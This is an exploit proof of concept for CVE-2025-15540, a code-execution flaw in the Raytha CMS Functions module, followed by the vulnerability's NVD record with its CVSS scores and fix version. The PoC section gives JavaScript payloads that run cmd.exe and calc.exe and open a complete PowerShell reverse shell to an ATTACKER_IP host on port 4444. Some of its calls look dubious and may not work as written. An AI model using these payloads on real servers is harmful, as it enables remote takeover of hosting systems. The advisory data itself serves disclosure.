CVE-2025-15540

// CVE-2025-15540 PoC - Raytha CMS RCE via Functions Module // This PoC demonstrates how to execute arbitrary commands through the Functions module // Example JavaScript code that could be entered in the Functions module: // Method 1: Using .NET Process to execute system commands var Process = Raytha.Engine.Sandbox.GetType().Assembly.GetType('System.Diagnostics.Process'); var StartInfo = Process.GetMethod('Start'); var process = Process.GetConstructors()[0].Invoke(null); process.StartInfo.FileName = 'cmd.exe'; process.StartInfo.Arguments = '/c whoami > C:\\inetpub\\wwwroot\\output.txt'; process.Start(); // Method 2: Direct command execution var shell = new ActiveXObject('WScript.Shell'); shell.Run('calc.exe', 1, true); // Method 3: PowerShell reverse shell var ps = Process.GetConstructors()[0].Invoke(null); ps.StartInfo.FileName = 'powershell.exe'; ps.StartInfo.Arguments = '-c "$client = New-Object System.Net.Sockets.TCPClient(\'ATTACKER_IP\',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"'; ps.Start();

{"cve": {"id": "CVE-2025-15540", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:55.953", "lastModified": "2026-03-17T14:24:04.947", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "\"Functions\" module in Raytha CMS allows privileged users to write custom code to add functionality to application. Due to a lack of sandboxing or access restrictions, JavaScript code executed through Raytha’s “functions” feature can instantiate .NET components and perform arbitrary operations within the application’s hosting environment.\n\nThis issue was fixed in version 1.4.6."}, {"lang": "es", "value": "El módulo 'Functions' en Raytha CMS permite a usuarios privilegiados escribir código personalizado para añadir funcionalidad a la aplicación. Debido a la falta de sandboxing o restricciones de acceso, el código JavaScript ejecutado a través de la característica 'functions' de Raytha puede instanciar componentes .NET y realizar operaciones arbitrarias dentro del entorno de alojamiento de la aplicación.\n\nEste problema fue solucionado en la versión 1.4.6."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:raytha:raytha:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.6", "matchCriteriaId": "4A4FC7D6-F33F-4121-A375-B063263585FD"}]}]}], "references": [{"url": "https://cert.pl/en/posts/2026/03/CVE-2025-69236", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://raytha.com", "source": "[email protected]", "tags": ["Product"]}]}}